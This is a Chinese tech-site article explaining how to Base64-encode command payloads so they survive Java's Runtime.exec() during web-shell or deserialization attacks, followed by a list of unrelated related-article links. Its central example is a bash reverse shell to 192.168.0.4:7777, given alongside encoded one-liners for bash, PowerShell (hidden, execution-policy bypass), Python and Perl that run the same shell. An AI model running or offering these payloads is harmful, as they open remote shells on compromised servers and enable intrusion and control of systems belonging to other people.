java.lang.Runtime.exec() Payload知識點詳解

更新時間：2020年03月11日 14:15:00 作者：御用閑人

在本篇文章里小編給大家整理的是一篇關于java.lang.Runtime.exec() Payload知識點相關內容，有興趣的朋友們學習下。

有時，通過Runtime.getRuntime().exec()執(zhí)行命令的有效負載有時會失敗。使用Web Shell，反序列化利用或通過其他媒介時，可能會發(fā)生這種情況。

有時這是因為重定向和管道字符的使用在啟動過程的上下文中沒有意義。例如，在shell中執(zhí)行l(wèi)s> dir_listing會將當前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中，該命令將被解釋為獲取>和dir_listing目錄的列表。

有時，StringTokenizer類會破壞其中包含空格的參數(shù)，該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。

借助Base64編碼，下面的轉換器可以幫助減少這些問題。它可以通過調用Bash或PowerShell來制作管道并重新定向，還可以確保參數(shù)內沒有空格。

樣例：

原文

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

編碼后：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
#bash

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==
#powershell

python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64'))
#python

perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='))
#perl

中間的字符均為“base64”編碼。

知識點擴展：

java.lang.Runtime.getRuntime().exec(cmd)命令中參數(shù)不能用空格怎么辦？

項目中無法執(zhí)行c程序，猜測是exec()函數(shù)的問題

String cmd= exe_path + " " +video + " " +host + ":" + port;
Process process = runtime.exec(cmd);

到此這篇關于java.lang.Runtime.exec() Payload知識點詳解的文章就介紹到這了,更多相關java.lang.Runtime.exec() Payload內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家！

您可能感興趣的文章:

java
Runtime

如何利用Jackson序列化忽略指定類型的屬性詳解
這篇文章主要給大家介紹了關于如何利用Jackson序列化忽略指定類型的屬性，文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧
2018-11-11
java實現(xiàn)一個掃描包的工具類實例代碼
很多框架，比如springmvc，mybatis等使用注解，為了處理注解，必然要對包進行掃描，所以下面這篇文章主要給大家分享介紹了關于利用java如何實現(xiàn)一個掃描包的工具類，文中通過示例代碼介紹的非常詳細，需要的朋友可以參考下。
2017-10-10
如何使用 IntelliJ IDEA 編寫 Spark 應用程序(Sc
本教程展示了如何在IntelliJIDEA中使用Maven編寫和運行一個簡單的Spark應用程序（例如WordCount程序）,本文通過實例代碼給大家介紹的非常詳細,感興趣的朋友跟隨小編一起看看吧
2024-11-11
2020 IDEA安裝教程與激活(idea2020激活碼)
這篇文章主要介紹了2020 IDEA安裝教程與激活(idea2020激活碼),本文通過圖文并茂的形式給大家介紹的非常詳細，對大家的學習或工作具有一定的參考借鑒價值，需要的朋友可以參考下
2020-11-11
使用java為pdf添加書簽的方法(pdf書簽制作)
下載一些pdf格式的電子書沒有書簽,用JAVA寫了一個小工具，將特定格式的文本解析成為書簽，然后保存到pdf格式中
2014-02-02
使用@Autowired 注入RedisTemplate報錯的問題及解決
這篇文章主要介紹了使用@Autowired 注入RedisTemplate報錯的問題及解決方案，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2022-08-08
Java中雙冒號(::)運算操作符用法詳解
這篇文章主要給大家介紹了關于Java中雙冒號(::)運算操作符用法的相關資料,雙冒號運算操作符是類方法的句柄,lambda表達式的一種簡寫,這種簡寫的學名叫eta-conversion或者叫η-conversion,需要的朋友可以參考下
2023-11-11
SpringMVC 上傳文件 MultipartFile 轉為 File的方法
這篇文章主要介紹了SpringMVC 上傳文件 MultipartFile 轉為 File的方法，文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧
2020-02-02
MybatisPlus使用排序查詢時將null值放到最后
按照更新時間排序,但是更新時間可能為null,因此將null的數(shù)據(jù)放到最后,本文主要介紹了MybatisPlus使用排序查詢時將null值放到最后,具有一定的參考價值,感興趣的可以了解一下
2023-08-08
Java中Final關鍵字的使用技巧及其性能優(yōu)勢詳解
這篇文章主要介紹了Java中Final關鍵字的使用技巧及其性能優(yōu)勢詳解,Java中的final關鍵字用于修飾變量、方法和類,可以讓它們在定義后不可更改,從而提高程序的穩(wěn)定性和可靠性,此外,final關鍵字還有一些使用技巧和性能優(yōu)勢,需要的朋友可以參考下
2023-10-10